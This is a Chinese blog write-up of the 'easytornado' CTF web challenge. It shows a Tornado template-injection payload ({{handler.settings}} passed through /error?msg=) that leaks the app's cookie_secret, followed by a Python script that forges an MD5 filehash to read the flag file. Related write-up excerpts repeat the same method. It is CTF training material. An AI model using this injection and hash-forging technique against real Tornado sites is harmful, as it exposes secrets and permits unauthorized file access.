攻防世界:web easytornado

最新推荐文章于 2024-04-05 15:16:42 发布
最新推荐文章于 2024-04-05 15:16:42 发布
阅读量168 收藏 1
点赞数
文章标签: python 安全 信息安全 编程语言 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZripenYe/article/details/120793697
版权

真不easy

目录

提取有用信息:

打开网站,发现有三个文件image

  • flag.txt: 告诉了我们flag的位置image
  • welcome.txt:告诉我们这是和render渲染函数有关,即可能存在SSTI漏洞image
  • hints.txt: 告诉了我们某个东西的加密方式image
    根据经验,盲猜这是个身份验证的秘钥,看见URL后面的东西像MD5加密后的密文,所以猜测可能就是filehash的值image

所以,我们访问/fllllllllllllag文件获取flag的格式就是:http://...//file?filename=/fllllllllllllag&filehash=xxxxxxxxxxxxxxxxxxxxxxxxxx

寻找漏洞

我们要寻找的肯定是SSTI漏洞
我们发现,只要在URL后面输入{{...}}的内容一定会跳转到error网站image
那就猜想这个网站可能有SSTI漏洞咯image
果然存在SSTI漏洞,那么现在就是招漏洞注入点

百度,找tornado的特点:

你也不知道,所以百度:tornado的漏洞
其实也不需要看懂,碰到了查一下就好image
注入:/error?msg={{handler.settings}}

image
得到了一串:
根据加密规则,写python脚本进行加密

import hashlib
filename='/fllllllllllllag'
cookie_security="557da611-8ab8-4cd2-916d-e075279074cd"


def getvalue(string):
	md5=hashlib.md5()
	md5.update(string.encode('utf-8'))
	return md5.hexdigest() #返回十六进制md5值(默认返回的是二进制)
def merge():
	flag=getvalue(cookie_security+getvalue(filename))
	#print(flag)
	payload='http://111.200.241.244:58389/file?filename=/fllllllllllllag&filehash='+flag
	print(payload)
if __name__=='__main__':
	merge()

得到image
直接输入这个URL就好了image

Zeker62
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
攻防世界】十六 --- easytornado --- python Tornado框架
qq_43168364的博客
12-28 365
题目 — easytornado 一、writeup 主页有三个文件 分别访问以下可以看到他们的URL格式如下图所示 都是文件名带一个filehash的格式,那就可以猜测访问flag文件的url格式应该就是:/file?filename=/flag的文件名&filehash=xxx。接下来依次看这几个文件的内容。/flag.txt文件 提示flag在:/fllllllllllllag中,我们的URL格式又进一步确定了:/file?filename=/fllllllllllllag&fi
黑客攻防技术宝典:Web实战篇(第2版)1
08-03
《黑客攻防技术宝典:Web实战篇(第2版)》是一本专注于Web应用程序安全的实战指南,由Dafydd Stuttard和Marcus Pinto撰写,由石华耀和傅志红翻译。该书深入浅出地探讨了Web应用程序的安全风险和攻防策略,适合网络...
攻防世界easytornado
qq_46230755的博客
01-07 508
题目点开存在三个文件 /flag.txt提醒我们flag存在的位置flag in /fllllllllllllag /welcome.txt提醒render,render({options}) 猜测存在模板注入 /hints.txt提醒md5(cookie_secret+md5(filename)) 即先将filenamemd5加密,再将cookie_secret与md5加密后的filename进行md5加密,目前我们需要知道的是filename和cookie_secret,猜测文件名为/flllllll
攻防世界easytornado
wangzhemvp的博客
04-05 282
可以把它理解为 tornado 模板中内置的环境配置信息名称,通过handler.settings 可以访问到环境配置的一些信息。看到 tornado 模板基本上就用 handler.settings。{{ }}有回显,一般存在模版注入。得到cookie_secret。模版注入 + tornado模板。
攻防世界-easytornado
qq_44065556的博客
09-24 208
从题目表述:Tornado框架 可以知道应该是Tornado框架漏洞 tormado是python中的一个web应用容器 点进去场景 呈现在眼前的是 三个链接 我们一个一个点进去看看 flag.txt点进去 flag就在 这里面 试一试url访问 /file?filename=/fllllllllllllag 跳转页面 报了error,在游览器上有回显,那判断这里可能存在模板注入(SSTI) {{ ... }}:装载一个变量,模板渲染的时候,会使用传进来的同名参数这...
攻防世界:适合作为桌面
10-08
标题“攻防世界:适合作为桌面”暗示了一个与网络安全相关的主题,可能是一个模拟实战的平台或游戏,其中用户可以通过解决各种安全问题来提升自己的技能。描述中的“misc”通常代表“miscellaneous”(杂项),表明...
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界:阳间题的实战解析与策略.zip
最新发布
05-13
总之,攻防世界竞赛是一个充满挑战和机遇的舞台。只要你热爱网络安全、愿意付出努力和时间、不断学习和实践,你一定能够在这个舞台上展现出自己的才华和实力。
攻防世界 easytornado
weixin_52268949的博客
02-23 2061
easytornado 进入环境就这样子 我们逐一访问看看 进入flag.txt提示flag in /fllllllllllllag我们访问fllllllllllllag看看 报了一个error,且在浏览器有回显,莫非是模板注入,我们试一试,把error换成456看看浏览器回显 确定有模板注入了但是这里没有更多信息我们只能先放一放了 然后我们去访问welcome.txt看看 第二个是一个render,render是一个Tomado框架的一个渲染函数,即可以通过传递不同的参数形成不同的页面。 还有个
攻防世界-web easytornado
m0_48108919的博客
02-11 707
题目描述:Tornado 框架 显示有3 个文件 1.访问flag.txt文件提示flag在fllllllllllllag文件中 2.访问welcome.txt文件,提示render render是一个Tomado框架的一个渲染函数,即可以通过传递不同的参数形成不同的页面,可能存在模板注入漏洞 3.访问hints.txt文件,看到有个md5加密方法,再看请求的url发现每个url都带有filehash,应该就是filehash的加密公式 根据url特征需要提供filename及.
攻防世界-web-easytornado
wuh2333的博客
07-19 1502
攻防世界,模板注入
攻防世界----easytornado笔记
qq_44418229的博客
07-05 494
攻防世界----easytornado学习笔记
攻防世界web进阶区之easytornado
qq_45756971的博客
07-22 323
点开题目所给链接: 会发现有三个链接,查看其他页面: /flag.txt:/welcome.txt:/hints.txt:我们通过第一个页面会发现flag藏于fllllllllllllag之中,所以我们直接输入/fllllllllllllag尝试,跳转页面会报错:此时我们通过error?msg={{ handler.settings }}传递得到cookie secret: 0df815ab-9f5c-4d1a-aa18-b8d0ebaa5edc,/fllllllllllllag的MD5为 3bf9f6cf
攻防世界web进阶区easytornado
gongjingege的博客
07-28 453
题目有描述提示,tornado框架 打开链接 发现3个文件 1,flag in /fllllllllllllag 2,render,可能会是SSTI模板注入 3,md5(cookie_secret+md5(filename)) url中输入/fllllllllllllag,直接error 用handler.settings对象拿到cookie url注入**/error?msg={{handler.settings}}** 根据hint,filehash值由md5加密 先filename即/fl
攻防世界easytornado-tornado模板注入
yuanxu8877的博客
11-28 371
攻防世界easytornado-tornado模板注入
攻防世界】十五、easytornado
Hi~ 土拨鼠
09-17 227
步骤 打开所给场景,发现给出了三个文件: 依次进行访问: flag.txt welcome.txt hints.txt 获得的信息:url是统一的,只有传递的参数在变化,flag在/fllllllllllllag中,也就是filename=/fllllllllllllag,filehash也给出了我们计算方法,render是python中一个渲染函数,渲染变量到模板中,即可以通过传递不同的参数形成不同的页面 所以现在我们只有拿到cookie_secret就行了 尝试访问(filehash暂时不知道.
网络攻防原理第01讲网络对抗概述
10-28
网络攻防原理第01讲网络对抗概述主要讲述了计算机网络领域中对抗策略的基础知识。该课程由XX大学XX学院XX教研室提供,旨在帮助学生理解和应对日益严峻的网络安全挑战。以下是课程的关键内容概览: 1. 网络安全事件...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值